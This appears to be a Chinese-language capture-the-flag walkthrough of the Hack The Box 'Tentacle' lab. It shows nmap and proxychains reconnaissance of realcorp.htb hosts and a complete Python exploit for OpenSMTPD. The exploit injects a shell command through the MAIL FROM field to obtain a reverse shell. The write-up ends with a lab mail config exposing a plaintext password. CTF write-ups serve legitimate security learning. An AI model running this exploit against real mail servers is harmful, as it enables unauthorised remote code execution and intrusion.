➜ ~ nmap -sT -Pn 10.10.10.224 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:10 EST Nmap scan report for 10.10.10.224 Host is up (0.069s latency). Not shown: 805 closed ports, 191 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 88/tcp open kerberos-sec 3128/tcp open squid-http
Nmap done: 1 IP address (1 host up) scanned in 1031.14 seconds
ns.realcorp.htb. 259200 IN A 10.197.243.77 proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb. ns.realcorp.htb. 259200 IN A 10.197.243.77 wpad.realcorp.htb. 259200 IN A 10.197.243.31 ns.realcorp.htb. 259200 IN A 10.197.243.77
➜ ~ proxychains4 nmap 10.197.243.31 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:09 EST Nmap scan report for wpad.realcorp.htb (10.197.243.31) Host is up (0.28s latency). Not shown: 993 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 464/tcp open kpasswd5 749/tcp open kerberos-adm 3128/tcp open squid-http
Nmap done: 1 IP address (1 host up) scanned in 301.92 seconds
➜ Tentacle proxychains4 nmap -sC -sV 10.241.251.113 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 11:49 EST Nmap scan report for 10.241.251.113 Host is up (0.28s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 25/tcp open smtp OpenSMTPD Service Info: Host: smtp.realcorp.htb
Nmap done: 1 IP address (1 host up) scanned in 282.22 seconds
import socket, time import sys if len(sys.argv) < 4: print("usage: getShell.py <host> <port> <command>") exit() HOST = sys.argv[1] PORT = int(sys.argv[2]) rev_shell_cmd = sys.argv[3] payload = b"""\r\n #0\r\n #1\r\n #2\r\n #3\r\n #4\r\n #5\r\n #6\r\n #7\r\n #8\r\n #9\r\n #a\r\n #b\r\n #c\r\n #d\r\n """ + rev_shell_cmd.encode() + b""" . """ for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res try: s = socket.socket(af, socktype, proto) except OSError as msg: s = None continue try: s.connect(sa) except OSError as msg: s.close() s = None continue break if s isNone: print('could not open socket') sys.exit(1) with s: data = s.recv(1024) print('Received', repr(data)) time.sleep(1) print('SENDING HELO') s.send(b"helo test.com\r\n") data = s.recv(1024) print('RECIEVED', repr(data)) s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n") time.sleep(1) data = s.recv(1024) print('RECIEVED', repr(data)) s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n") data = s.recv(1024) print('RECIEVED', repr(data)) s.send(b"DATA\r\n") data = s.recv(1024) print('RECIEVED', repr(data)) s.send(payload) data = s.recv(1024) print('RECIEVED', repr(data)) s.send(b"QUIT\r\n") data = s.recv(1024) print('RECIEVED', repr(data)) print("Exploited Check you netcat :D") s.close()
信息搜集
.msmtprc
在j.nakazawa用户目录可以发现.msmtprc文件,里面有密码,但这个密码不能直接ssh:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
# Set default values for all following accounts. defaults auth on tls on tls_trust_file /etc/ssl/certs/ca-certificates.crt logfile /dev/null
# RealCorp Mail account realcorp host 127.0.0.1 port 587 from j.nakazawa@realcorp.htb user j.nakazawa password sJB}RM>6Z~64_ tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
# Set a default account account default : realcorp
